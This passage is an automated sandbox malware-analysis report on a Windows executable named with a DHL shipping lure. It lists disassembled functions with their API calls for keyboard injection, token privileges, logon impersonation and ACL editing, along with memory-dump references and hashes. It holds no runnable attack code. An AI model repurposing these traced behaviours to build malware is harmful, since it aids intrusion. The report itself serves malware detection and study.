                                                                                            • Associated: 00000000.00000002.2075512255.00000000008BC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2075512255.00000000008E2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2075607994.00000000008EC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2075644862.00000000008F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_0_2_820000_DHL 0737-12182024.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID:
                                                                                            • API String ID:
                                                                                            • Opcode ID: d6c69ec2a70ac845cc05b5f137181c3f07394ab8b33ef369e8c7ef627d5c9574
                                                                                            • Instruction ID: 1244d36ab5ae52e505c077b411d172770f18427aec3a916dc0092073a6fd3bb3
                                                                                            • Opcode Fuzzy Hash: d6c69ec2a70ac845cc05b5f137181c3f07394ab8b33ef369e8c7ef627d5c9574
                                                                                            • Instruction Fuzzy Hash: 16F0D132510A1C96C7313A7D9C05B5A379CFF62336F110715F825E22D2DA749809C6A6
                                                                                            Function 00853820 Relevance: 1.5, APIs: 1, Instructions: 32memoryCOMMONLIBRARYCODE
                                                                                            Download Yara Rule
                                                                                            APIs
                                                                                            • RtlAllocateHeap.NTDLL(00000000,?,008F1444,?,0083FDF5,?,?,0082A976,00000010,008F1440,008213FC,?,008213C6,?,00821129), ref: 00853852
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000002.2075231132.0000000000821000.00000020.00000001.01000000.00000003.sdmp, Offset: 00820000, based on PE: true
                                                                                            • Associated: 00000000.00000002.2075203477.0000000000820000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2075512255.00000000008BC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2075512255.00000000008E2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2075607994.00000000008EC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2075644862.00000000008F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_0_2_820000_DHL 0737-12182024.jbxd
                                                                                            Similarity
                                                                                            • API ID: AllocateHeap
                                                                                            • String ID:
                                                                                            • API String ID: 1279760036-0
                                                                                            • Opcode ID: 449c898ab95255bde88a3de7302a4abeeda63a52249d0046d8a6290c013dd537
                                                                                            • Instruction ID: ede5bc5cd6d5a0ad9dde0daab235c4bda22375029158486ae8798a56b6fc5631
                                                                                            • Opcode Fuzzy Hash: 449c898ab95255bde88a3de7302a4abeeda63a52249d0046d8a6290c013dd537
                                                                                            • Instruction Fuzzy Hash: 54E0E531100228A7D635267A9C04B9A3748FB427F7F050131BC14E3581CB91DE0581E1
                                                                                            Function 00824F39 Relevance: 1.5, APIs: 1, Instructions: 28COMMON
                                                                                            Download Yara Rule
                                                                                            APIs
                                                                                            • FreeLibrary.KERNEL32(?,?,008F1418,00000001,>>>AUTOIT NO CMDEXECUTE<<<,?,?,?,00000000), ref: 00824F6D
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000002.2075231132.0000000000821000.00000020.00000001.01000000.00000003.sdmp, Offset: 00820000, based on PE: true
                                                                                            • Associated: 00000000.00000002.2075203477.0000000000820000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2075512255.00000000008BC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2075512255.00000000008E2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2075607994.00000000008EC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2075644862.00000000008F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_0_2_820000_DHL 0737-12182024.jbxd
                                                                                            Similarity
                                                                                            • API ID: FreeLibrary
                                                                                            • String ID:
                                                                                            • API String ID: 3664257935-0
                                                                                            • Opcode ID: d81567cf5992a0d7b4a6bd2157d5b37f460f0ac7ad019b4a1018d4cddcba1024
                                                                                            • Instruction ID: a299dba27f7e9aa2336528dd6b919146f662e420374c4b7a773b17f6c88ad713
                                                                                            • Opcode Fuzzy Hash: d81567cf5992a0d7b4a6bd2157d5b37f460f0ac7ad019b4a1018d4cddcba1024
                                                                                            • Instruction Fuzzy Hash: 29F03971105762CFDB349F64E590822BBE4FF543293209A7EE2EAD2621CB319884DF20
                                                                                            Function 00822DA5 Relevance: 1.5, APIs: 1, Instructions: 23COMMON
                                                                                            Download Yara Rule
                                                                                            APIs
                                                                                            • GetLongPathNameW.KERNELBASE(?,?,00007FFF), ref: 00822DC4
                                                                                              • Part of subcall function 00826B57: _wcslen.LIBCMT ref: 00826B6A
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000002.2075231132.0000000000821000.00000020.00000001.01000000.00000003.sdmp, Offset: 00820000, based on PE: true
                                                                                            • Associated: 00000000.00000002.2075203477.0000000000820000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2075512255.00000000008BC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2075512255.00000000008E2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2075607994.00000000008EC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2075644862.00000000008F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_0_2_820000_DHL 0737-12182024.jbxd
                                                                                            Similarity
                                                                                            • API ID: LongNamePath_wcslen
                                                                                            • String ID:
                                                                                            • API String ID: 541455249-0
                                                                                            • Opcode ID: 09586e230dbec0fd39aa7f4c608bb84fba39832336a178990a2d6d295618efd1
                                                                                            • Instruction ID: 2a50aeb3e3ba8cd767673beac742ecbf205e07185a02c455b24d401972eb4e7e
                                                                                            • Opcode Fuzzy Hash: 09586e230dbec0fd39aa7f4c608bb84fba39832336a178990a2d6d295618efd1
                                                                                            • Instruction Fuzzy Hash: 43E0CD726001245BCB21925C9C05FDA77DDFFC8790F050171FD09D7258DA60AD808551
                                                                                            Function 00822B3D Relevance: 1.5, APIs: 1, Instructions: 22COMMON
                                                                                            Download Yara Rule
                                                                                            APIs
                                                                                              • Part of subcall function 00823837: Shell_NotifyIconW.SHELL32(00000000,?), ref: 00823908
                                                                                              • Part of subcall function 0082D730: GetInputState.USER32 ref: 0082D807
                                                                                            • SetCurrentDirectoryW.KERNEL32(?), ref: 00822B6B
                                                                                              • Part of subcall function 008230F2: Shell_NotifyIconW.SHELL32(00000002,?), ref: 0082314E
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000002.2075231132.0000000000821000.00000020.00000001.01000000.00000003.sdmp, Offset: 00820000, based on PE: true
                                                                                            • Associated: 00000000.00000002.2075203477.0000000000820000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2075512255.00000000008BC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2075512255.00000000008E2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2075607994.00000000008EC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2075644862.00000000008F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_0_2_820000_DHL 0737-12182024.jbxd
                                                                                            Similarity
                                                                                            • API ID: IconNotifyShell_$CurrentDirectoryInputState
                                                                                            • String ID:
                                                                                            • API String ID: 3667716007-0
                                                                                            • Opcode ID: fb2cba4bdaf6388e47f56eff22eafc0911098da015db2dc446f3d88c0f358f0d
                                                                                            • Instruction ID: 67d0d44c3e60e1de5111b6a32627aae9c9a3e98884cf915b05aaba31af975c63
                                                                                            • Opcode Fuzzy Hash: fb2cba4bdaf6388e47f56eff22eafc0911098da015db2dc446f3d88c0f358f0d
                                                                                            • Instruction Fuzzy Hash: 20E0862130426856CA04BB7CB86657DA75AFBE5351F40153EF182C71A2CE2945C982A3
                                                                                            Function 0086039A Relevance: 1.5, APIs: 1, Instructions: 15fileCOMMONLIBRARYCODE
                                                                                            Download Yara Rule
                                                                                            APIs
                                                                                            • CreateFileW.KERNELBASE(00000000,00000000,?,00860704,?,?,00000000,?,00860704,00000000,0000000C), ref: 008603B7
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000002.2075231132.0000000000821000.00000020.00000001.01000000.00000003.sdmp, Offset: 00820000, based on PE: true
                                                                                            • Associated: 00000000.00000002.2075203477.0000000000820000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2075512255.00000000008BC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2075512255.00000000008E2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2075607994.00000000008EC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2075644862.00000000008F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_0_2_820000_DHL 0737-12182024.jbxd
                                                                                            Similarity
                                                                                            • API ID: CreateFile
                                                                                            • String ID:
                                                                                            • API String ID: 823142352-0
                                                                                            • Opcode ID: cb4f092870194c4b2c5c0b2c869ce1daad83245febc67986facfb83c82bd074e
                                                                                            • Instruction ID: 6fedd44739148520127f40239842e17201b234b3a97b952fa754a2a905c7333d
                                                                                            • Opcode Fuzzy Hash: cb4f092870194c4b2c5c0b2c869ce1daad83245febc67986facfb83c82bd074e
                                                                                            • Instruction Fuzzy Hash: A6D06C3204010DBBDF128F84DD06EDA3BAAFB48714F014100BE1866020C732E821AB90
                                                                                            Function 00821CAD Relevance: 1.5, APIs: 1, Instructions: 8COMMON
                                                                                            Download Yara Rule
                                                                                            APIs
                                                                                            • SystemParametersInfoW.USER32(00002001,00000000,00000002), ref: 00821CBC
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000002.2075231132.0000000000821000.00000020.00000001.01000000.00000003.sdmp, Offset: 00820000, based on PE: true
                                                                                            • Associated: 00000000.00000002.2075203477.0000000000820000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2075512255.00000000008BC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2075512255.00000000008E2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2075607994.00000000008EC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2075644862.00000000008F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_0_2_820000_DHL 0737-12182024.jbxd
                                                                                            Similarity
                                                                                            • API ID: InfoParametersSystem
                                                                                            • String ID:
                                                                                            • API String ID: 3098949447-0
                                                                                            • Opcode ID: 1964b8693833c0413aa3aab735a627655fbd7f5abf070d522ac647897cd5e029
                                                                                            • Instruction ID: a56cf2a68e4ae0e3250450afbc6631c3d2a60cd0481a3cd2a429ec8fce7e3c17
                                                                                            • Opcode Fuzzy Hash: 1964b8693833c0413aa3aab735a627655fbd7f5abf070d522ac647897cd5e029
                                                                                            • Instruction Fuzzy Hash: A9C09236280305EFF6248BA0BC4EF207764B34CB00F048101F609A96E3C3A22820EA60
                                                                                            Function 00B63F30 Relevance: 1.3, APIs: 1, Instructions: 18sleepCOMMON
                                                                                            Download Yara Rule
                                                                                            APIs
                                                                                            • Sleep.KERNELBASE(000001F4), ref: 00B63F41
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000002.2075924973.0000000000B61000.00000040.00000020.00020000.00000000.sdmp, Offset: 00B61000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_0_2_b61000_DHL 0737-12182024.jbxd
                                                                                            Similarity
                                                                                            • API ID: Sleep
                                                                                            • String ID:
                                                                                            • API String ID: 3472027048-0
                                                                                            • Opcode ID: 368835ae2f5fba710e6c01549c2017e46dd928bc4d187f44ede00cceab054826
                                                                                            • Instruction ID: 51c4f4b9bbc66b717405ba918b4abcb5f61fc05bd0cb762efc995f986bfa6785
                                                                                            • Opcode Fuzzy Hash: 368835ae2f5fba710e6c01549c2017e46dd928bc4d187f44ede00cceab054826
                                                                                            • Instruction Fuzzy Hash: 5DE0E67494410DDFDB00EFB4D54969E7FF4EF04701F1001A1FD05D2280D7309E508A62

                                                                                            Non-executed Functions

                                                                                            Function 008B9576 Relevance: 72.4, APIs: 39, Strings: 2, Instructions: 625windowkeyboardCOMMON
                                                                                            Download Yara Rule
                                                                                            APIs
                                                                                              • Part of subcall function 00839BA1: GetWindowLongW.USER32(00000000,000000EB), ref: 00839BB2
                                                                                            • DefDlgProcW.USER32(?,0000004E,?,?,?,?,?,?), ref: 008B961A
                                                                                            • SendMessageW.USER32(?,0000130B,00000000,00000000), ref: 008B965B
                                                                                            • GetWindowLongW.USER32(FFFFFDD9,000000F0), ref: 008B969F
                                                                                            • SendMessageW.USER32(?,0000110A,00000009,00000000), ref: 008B96C9
                                                                                            • SendMessageW.USER32 ref: 008B96F2
                                                                                            • GetKeyState.USER32(00000011), ref: 008B978B
                                                                                            • GetKeyState.USER32(00000009), ref: 008B9798
                                                                                            • SendMessageW.USER32(?,0000130B,00000000,00000000), ref: 008B97AE
                                                                                            • GetKeyState.USER32(00000010), ref: 008B97B8
                                                                                            • SendMessageW.USER32(?,0000110A,00000009,00000000), ref: 008B97E9
                                                                                            • SendMessageW.USER32 ref: 008B9810
                                                                                            • SendMessageW.USER32(?,00001030,?,008B7E95), ref: 008B9918
                                                                                            • ImageList_SetDragCursorImage.COMCTL32(00000000,00000000,00000000,?,?,?), ref: 008B992E
                                                                                            • ImageList_BeginDrag.COMCTL32(00000000,000000F8,000000F0), ref: 008B9941
                                                                                            • SetCapture.USER32(?), ref: 008B994A
                                                                                            • ClientToScreen.USER32(?,?), ref: 008B99AF
                                                                                            • ImageList_DragEnter.COMCTL32(00000000,?,?), ref: 008B99BC
                                                                                            • InvalidateRect.USER32(?,00000000,00000001,?,?,?), ref: 008B99D6
                                                                                            • ReleaseCapture.USER32 ref: 008B99E1
                                                                                            • GetCursorPos.USER32(?), ref: 008B9A19
                                                                                            • ScreenToClient.USER32(?,?), ref: 008B9A26
                                                                                            • SendMessageW.USER32(?,00001012,00000000,?), ref: 008B9A80
                                                                                            • SendMessageW.USER32 ref: 008B9AAE
                                                                                            • SendMessageW.USER32(?,00001111,00000000,?), ref: 008B9AEB
                                                                                            • SendMessageW.USER32 ref: 008B9B1A
                                                                                            • SendMessageW.USER32(?,0000110B,00000009,00000000), ref: 008B9B3B
                                                                                            • SendMessageW.USER32(?,0000110B,00000009,?), ref: 008B9B4A
                                                                                            • GetCursorPos.USER32(?), ref: 008B9B68
                                                                                            • ScreenToClient.USER32(?,?), ref: 008B9B75
                                                                                            • GetParent.USER32(?), ref: 008B9B93
                                                                                            • SendMessageW.USER32(?,00001012,00000000,?), ref: 008B9BFA
                                                                                            • SendMessageW.USER32 ref: 008B9C2B
                                                                                            • ClientToScreen.USER32(?,?), ref: 008B9C84
                                                                                            • TrackPopupMenuEx.USER32(?,00000000,?,?,?,00000000), ref: 008B9CB4
                                                                                            • SendMessageW.USER32(?,00001111,00000000,?), ref: 008B9CDE
                                                                                            • SendMessageW.USER32 ref: 008B9D01
                                                                                            • ClientToScreen.USER32(?,?), ref: 008B9D4E
                                                                                            • TrackPopupMenuEx.USER32(?,00000080,?,?,?,00000000), ref: 008B9D82
                                                                                              • Part of subcall function 00839944: GetWindowLongW.USER32(?,000000EB), ref: 00839952
                                                                                            • GetWindowLongW.USER32(?,000000F0), ref: 008B9E05
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000002.2075231132.0000000000821000.00000020.00000001.01000000.00000003.sdmp, Offset: 00820000, based on PE: true
                                                                                            • Associated: 00000000.00000002.2075203477.0000000000820000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2075512255.00000000008BC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2075512255.00000000008E2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2075607994.00000000008EC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2075644862.00000000008F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_0_2_820000_DHL 0737-12182024.jbxd
                                                                                            Similarity
                                                                                            • API ID: MessageSend$ClientScreen$ImageLongWindow$CursorDragList_State$CaptureMenuPopupTrack$BeginEnterInvalidateParentProcRectRelease
                                                                                            • String ID: @GUI_DRAGID$F
                                                                                            • API String ID: 3429851547-4164748364
                                                                                            • Opcode ID: 0a3dc0521282a3d6aacb33e74fea2e221c52b9255083eaa34ee36267bb7be0ac
                                                                                            • Instruction ID: 4e5113976c54c70f08a22cc5ac6adeaf7ab998006b56933dc315c66c982586aa
                                                                                            • Opcode Fuzzy Hash: 0a3dc0521282a3d6aacb33e74fea2e221c52b9255083eaa34ee36267bb7be0ac
                                                                                            • Instruction Fuzzy Hash: B3426934204251AFDB24CF68CC48EAABBE5FF5A314F144619F699C73A1E771A850CB92
                                                                                            Function 008B4873 Relevance: 60.1, APIs: 33, Strings: 1, Instructions: 566windowCOMMON
                                                                                            Download Yara Rule
                                                                                            APIs
                                                                                            • SendMessageW.USER32(00000000,00000408,00000000,00000000), ref: 008B48F3
                                                                                            • SendMessageW.USER32(00000000,00000188,00000000,00000000), ref: 008B4908
                                                                                            • SendMessageW.USER32(00000000,0000018A,00000000,00000000), ref: 008B4927
                                                                                            • SendMessageW.USER32(?,00000148,00000000,00000000), ref: 008B494B
                                                                                            • SendMessageW.USER32(00000000,00000147,00000000,00000000), ref: 008B495C
                                                                                            • SendMessageW.USER32(00000000,00000149,00000000,00000000), ref: 008B497B
                                                                                            • SendMessageW.USER32(00000000,0000130B,00000000,00000000), ref: 008B49AE
                                                                                            • SendMessageW.USER32(00000000,0000133C,00000000,?), ref: 008B49D4
                                                                                            • SendMessageW.USER32(00000000,0000110A,00000009,00000000), ref: 008B4A0F
                                                                                            • SendMessageW.USER32(00000000,0000113E,00000000,00000004), ref: 008B4A56
                                                                                            • SendMessageW.USER32(00000000,0000113E,00000000,00000004), ref: 008B4A7E
                                                                                            • IsMenu.USER32(?), ref: 008B4A97
                                                                                            • GetMenuItemInfoW.USER32(?,?,00000000,?), ref: 008B4AF2
                                                                                            • GetMenuItemInfoW.USER32(?,?,00000000,?), ref: 008B4B20
                                                                                            • GetWindowLongW.USER32(?,000000F0), ref: 008B4B94
                                                                                            • SendMessageW.USER32(?,0000113E,00000000,00000008), ref: 008B4BE3
                                                                                            • SendMessageW.USER32(00000000,00001001,00000000,?), ref: 008B4C82
                                                                                            • wsprintfW.USER32 ref: 008B4CAE
                                                                                            • SendMessageW.USER32(00000000,0000000E,00000000,00000000), ref: 008B4CC9
                                                                                            • GetWindowTextW.USER32(?,00000000,00000001), ref: 008B4CF1
                                                                                            • SendMessageW.USER32(00000000,000000F0,00000000,00000000), ref: 008B4D13
                                                                                            • SendMessageW.USER32(00000000,0000000E,00000000,00000000), ref: 008B4D33
                                                                                            • GetWindowTextW.USER32(?,00000000,00000001), ref: 008B4D5A
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000002.2075231132.0000000000821000.00000020.00000001.01000000.00000003.sdmp, Offset: 00820000, based on PE: true
                                                                                            • Associated: 00000000.00000002.2075203477.0000000000820000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2075512255.00000000008BC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2075512255.00000000008E2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2075607994.00000000008EC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2075644862.00000000008F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_0_2_820000_DHL 0737-12182024.jbxd
                                                                                            Similarity
                                                                                            • API ID: MessageSend$MenuWindow$InfoItemText$Longwsprintf
                                                                                            • String ID: %d/%02d/%02d
                                                                                            • API String ID: 4054740463-328681919
                                                                                            • Opcode ID: 7be73e5622b86881cfa46bc341deab1aefccb8e24684315023e999abfb425c26
                                                                                            • Instruction ID: 3b3ea949df800d3105a5714dff7b426e4d977e2f1e721800dbabaa0c008b754c
                                                                                            • Opcode Fuzzy Hash: 7be73e5622b86881cfa46bc341deab1aefccb8e24684315023e999abfb425c26
                                                                                            • Instruction Fuzzy Hash: D212AD71600218ABEB258F28CC4AFEE7BB8FF45714F145229F516EB3A2DB749941CB50
                                                                                            Function 0083F98E Relevance: 43.9, APIs: 24, Strings: 1, Instructions: 130keyboardthreadwindowCOMMON
                                                                                            Download Yara Rule
                                                                                            APIs
                                                                                            • GetForegroundWindow.USER32(00000000,00000000,00000000), ref: 0083F998
                                                                                            • FindWindowW.USER32(Shell_TrayWnd,00000000), ref: 0087F474
                                                                                            • IsIconic.USER32(00000000), ref: 0087F47D
                                                                                            • ShowWindow.USER32(00000000,00000009), ref: 0087F48A
                                                                                            • SetForegroundWindow.USER32(00000000), ref: 0087F494
                                                                                            • GetWindowThreadProcessId.USER32(00000000,00000000), ref: 0087F4AA
                                                                                            • GetCurrentThreadId.KERNEL32 ref: 0087F4B1
                                                                                            • GetWindowThreadProcessId.USER32(00000000,00000000), ref: 0087F4BD
                                                                                            • AttachThreadInput.USER32(?,00000000,00000001), ref: 0087F4CE
                                                                                            • AttachThreadInput.USER32(?,00000000,00000001), ref: 0087F4D6
                                                                                            • AttachThreadInput.USER32(00000000,000000FF,00000001), ref: 0087F4DE
                                                                                            • SetForegroundWindow.USER32(00000000), ref: 0087F4E1
                                                                                            • MapVirtualKeyW.USER32(00000012,00000000), ref: 0087F4F6
                                                                                            • keybd_event.USER32(00000012,00000000), ref: 0087F501
                                                                                            • MapVirtualKeyW.USER32(00000012,00000000), ref: 0087F50B
                                                                                            • keybd_event.USER32(00000012,00000000), ref: 0087F510
                                                                                            • MapVirtualKeyW.USER32(00000012,00000000), ref: 0087F519
                                                                                            • keybd_event.USER32(00000012,00000000), ref: 0087F51E
                                                                                            • MapVirtualKeyW.USER32(00000012,00000000), ref: 0087F528
                                                                                            • keybd_event.USER32(00000012,00000000), ref: 0087F52D
                                                                                            • SetForegroundWindow.USER32(00000000), ref: 0087F530
                                                                                            • AttachThreadInput.USER32(?,000000FF,00000000), ref: 0087F557
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000002.2075231132.0000000000821000.00000020.00000001.01000000.00000003.sdmp, Offset: 00820000, based on PE: true
                                                                                            • Associated: 00000000.00000002.2075203477.0000000000820000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2075512255.00000000008BC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2075512255.00000000008E2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2075607994.00000000008EC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2075644862.00000000008F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_0_2_820000_DHL 0737-12182024.jbxd
                                                                                            Similarity
                                                                                            • API ID: Window$Thread$AttachForegroundInputVirtualkeybd_event$Process$CurrentFindIconicShow
                                                                                            • String ID: Shell_TrayWnd
                                                                                            • API String ID: 4125248594-2988720461
                                                                                            • Opcode ID: a97e884daa9662ece3f0805210f1172bfb82c32e7c0d24e9fa7bab8eff367538
                                                                                            • Instruction ID: 1da6e9908919e995b36a0dba99394482292bbd4c1c318fd67631d38d43497f91
                                                                                            • Opcode Fuzzy Hash: a97e884daa9662ece3f0805210f1172bfb82c32e7c0d24e9fa7bab8eff367538
                                                                                            • Instruction Fuzzy Hash: 90317471A40218BBEB206FB69C4AFBF7F6CFB45B50F104165FB05E61D1C6B19D00AAA0
                                                                                            Function 00881201 Relevance: 38.7, APIs: 19, Strings: 3, Instructions: 241COMMON
                                                                                            Download Yara Rule
                                                                                            APIs
                                                                                              • Part of subcall function 008816C3: LookupPrivilegeValueW.ADVAPI32(00000000,00000000,00000004), ref: 0088170D
                                                                                              • Part of subcall function 008816C3: AdjustTokenPrivileges.ADVAPI32(?,00000000,00000000,?,00000000,?), ref: 0088173A
                                                                                              • Part of subcall function 008816C3: GetLastError.KERNEL32 ref: 0088174A
                                                                                            • LogonUserW.ADVAPI32(?,?,?,00000000,00000000,?), ref: 00881286
                                                                                            • DuplicateTokenEx.ADVAPI32(?,00000000,00000000,00000002,00000001,?), ref: 008812A8
                                                                                            • CloseHandle.KERNEL32(?), ref: 008812B9
                                                                                            • OpenWindowStationW.USER32(winsta0,00000000,00060000), ref: 008812D1
                                                                                            • GetProcessWindowStation.USER32 ref: 008812EA
                                                                                            • SetProcessWindowStation.USER32(00000000), ref: 008812F4
                                                                                            • OpenDesktopW.USER32(default,00000000,00000000,00060081), ref: 00881310
                                                                                              • Part of subcall function 008810BF: AdjustTokenPrivileges.ADVAPI32(?,00000000,?,00000000,00000000,00000000,?,008811FC), ref: 008810D4
                                                                                              • Part of subcall function 008810BF: CloseHandle.KERNEL32(?,?,008811FC), ref: 008810E9
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000002.2075231132.0000000000821000.00000020.00000001.01000000.00000003.sdmp, Offset: 00820000, based on PE: true
                                                                                            • Associated: 00000000.00000002.2075203477.0000000000820000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2075512255.00000000008BC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2075512255.00000000008E2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2075607994.00000000008EC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2075644862.00000000008F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_0_2_820000_DHL 0737-12182024.jbxd
                                                                                            Similarity
                                                                                            • API ID: StationTokenWindow$AdjustCloseHandleOpenPrivilegesProcess$DesktopDuplicateErrorLastLogonLookupPrivilegeUserValue
                                                                                            • String ID: $default$winsta0
                                                                                            • API String ID: 22674027-1027155976
                                                                                            • Opcode ID: 5825ac0912981789a16a6a706546c490e89043df9b900d42d4ed0fa0a0fd0a1f
                                                                                            • Instruction ID: 385a4451fa391cffeb13ac6ad5cdc71fe10c041451588daf4e1cdfebe5362f92
                                                                                            • Opcode Fuzzy Hash: 5825ac0912981789a16a6a706546c490e89043df9b900d42d4ed0fa0a0fd0a1f
                                                                                            • Instruction Fuzzy Hash: ED818D71900209ABDF21AFA8DC49FEE7BBEFF04704F144129F911E62A0DB359946CB65
                                                                                            Function 00880B62 Relevance: 31.7, APIs: 21, Instructions: 202memoryCOMMON
                                                                                            Download Yara Rule
                                                                                            APIs
                                                                                              • Part of subcall function 008810F9: GetUserObjectSecurity.USER32(?,00000004,?,00000000,?), ref: 00881114
                                                                                              • Part of subcall function 008810F9: GetLastError.KERNEL32(?,00000000,00000000,?,?,00880B9B,?,?,?), ref: 00881120
                                                                                              • Part of subcall function 008810F9: GetProcessHeap.KERNEL32(00000008,?,?,00000000,00000000,?,?,00880B9B,?,?,?), ref: 0088112F
                                                                                              • Part of subcall function 008810F9: HeapAlloc.KERNEL32(00000000,?,00000000,00000000,?,?,00880B9B,?,?,?), ref: 00881136
                                                                                              • Part of subcall function 008810F9: GetUserObjectSecurity.USER32(?,00000004,00000000,?,?), ref: 0088114D
                                                                                            • GetSecurityDescriptorDacl.ADVAPI32(?,?,?,?), ref: 00880BCC
                                                                                            • GetAclInformation.ADVAPI32(?,?,0000000C,00000002), ref: 00880C00
                                                                                            • GetLengthSid.ADVAPI32(?), ref: 00880C17
                                                                                            • GetAce.ADVAPI32(?,00000000,?), ref: 00880C51
                                                                                            • AddAce.ADVAPI32(?,00000002,000000FF,?,?), ref: 00880C6D
                                                                                            • GetLengthSid.ADVAPI32(?), ref: 00880C84
                                                                                            • GetProcessHeap.KERNEL32(00000008,00000008), ref: 00880C8C
                                                                                            • HeapAlloc.KERNEL32(00000000), ref: 00880C93
                                                                                            • GetLengthSid.ADVAPI32(?,00000008,?), ref: 00880CB4
                                                                                            • CopySid.ADVAPI32(00000000), ref: 00880CBB
                                                                                            • AddAce.ADVAPI32(?,00000002,000000FF,00000000,?), ref: 00880CEA
